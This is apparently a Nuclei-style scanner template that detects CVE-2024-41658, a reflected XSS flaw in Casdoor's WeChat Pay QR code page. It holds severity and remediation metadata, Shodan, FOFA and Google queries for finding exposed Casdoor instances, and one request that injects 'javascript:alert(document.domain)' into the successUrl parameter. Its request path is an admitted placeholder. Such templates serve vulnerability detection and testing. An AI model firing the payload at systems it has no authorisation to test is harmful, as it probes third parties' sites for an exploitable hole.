CVE-2024-41658.yaml
id: CVE-2024-41658

info:
  name: Reflected XSS in Casdoor WeChat Pay QR Code Page
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    Casdoor 1.577.0 and earlier is vulnerable to reflected XSS via the successUrl parameter in the WeChat Pay QR code page. This vulnerability can lead to account takeover when the crafted link is used after a successful payment.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information or account takeover.
  remediation: |
    Implement proper input validation and output encoding to prevent XSS attacks.
  reference:
    - https://github.com/casdoor/casdoor/blob/v1.577.0/web/src/QrCodePage.js
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-41658
    cwe-id: CWE-79
    epss-score: 0.00046
    epss-percentile: 0.18638
    cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
  metadata:
    vendor: casbin
    product: casdoor
    shodan-query: http.title:"Casdoor"
    fofa-query: title="casdoor"
    google-query: intitle:"casdoor"

http:
  - method: GET
    path:
      # "/path/to/qrpage" is a placeholder in this template, not a route taken from Casdoor.
      - "{{BaseURL}}/path/to/qrpage?successUrl=javascript:alert(document.domain)"
    matchers:
      # Matches only when the successUrl value appears verbatim in the response body.
      - type: word
        words:
          - "javascript:alert(document.domain)"
        part: body